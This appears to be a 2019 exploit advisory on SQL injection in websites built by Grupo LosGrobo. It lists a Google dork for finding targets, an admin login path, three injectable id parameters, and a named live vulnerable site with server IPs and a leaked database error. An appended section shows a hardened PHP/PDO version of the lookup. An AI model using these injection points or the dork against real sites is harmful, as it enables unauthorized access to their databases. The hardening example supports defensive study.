
Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019

# Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : losgrobo.com ~ grupolosgrobo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Grupo LosGrobo'' site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html

################################################################

# Admin Panel Login Path :

/reportesUPJ/index.aspx

# SQL Injection Exploit :

/novedades.php?id=[SQL Injection]

/mercado.php?id=[SQL Injection]

/rse_notas.php?id=[SQL Injection]

################################################################

# Example Vulnerable Site =>

Note : (192.185.3.54) => There are 106 domains hosted on this server.

Note : (192.185.30.132) => There are 63 domains hosted on this server.

[+] upj.com.ar/novedades.php?id=719%27 =>

[ Proof of Concept ] => archive.fo/2kEkb

################################################################

# SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie -
headers already sent by (output started at /home/upjcom/public_html/novedades.php:5)
in /home/upjcom/public_html/novedades_include.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cache limiter -
headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in
/home/upjcom/public_html/novedades_include.php on line 2

Consulta no válida: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'' and state=1 order by created desc LIMIT 0,5' at line 1
Consulta completa: SELECT id, date_format(created,) AS fecha ,
title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1
order by created desc LIMIT 0,5
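
The error output above shows the id value being concatenated into the query text and the full query being echoed back to the client. The following is an added example, not part of the original advisory and not the site's own code, showing a hardened form of that lookup in PHP with PDO. Assumptions: the function name fetch_news(), the in-memory SQLite database and the sample row are constructed for illustration, and the MySQL date_format() call is left out because its format string is missing from the page.

```php
<?php
// Hardened version of the lookup seen in the leaked query.
// Table and column names are taken from the error output; everything
// else (function name, sample data, SQLite backend) is constructed.

function fetch_news(PDO $db, $rawId): array
{
    // 1. Validate: id must be a positive integer, so a value such as
    //    "719'" is rejected before any SQL is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];
    }

    try {
        // 2. Bind: the value is sent separately from the SQL text and
        //    can never change the structure of the statement.
        $stmt = $db->prepare(
            'SELECT id, created, title, introtext, alias
               FROM jos_content
              WHERE catid = 47 AND id = :id AND state = 1
              ORDER BY created DESC LIMIT 5'
        );
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // 3. Log server-side only; never echo the query, the driver
        //    message or file paths back to the client.
        error_log('news lookup failed: ' . $e->getMessage());
        return [];
    }
}

// Constructed sample data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jos_content (id INTEGER, catid INTEGER,
           state INTEGER, created TEXT, title TEXT,
           introtext TEXT, alias TEXT)');
$db->exec("INSERT INTO jos_content VALUES
           (719, 47, 1, '2019-01-01', 'Sample', 'Intro', 'sample')");

var_dump(count(fetch_news($db, '719')));   // well-formed id
var_dump(count(fetch_news($db, "719'")));  // malformed id from the advisory
```

In production, display_errors should also be off so that warnings like the session_start() messages above do not disclose filesystem paths.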

################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################
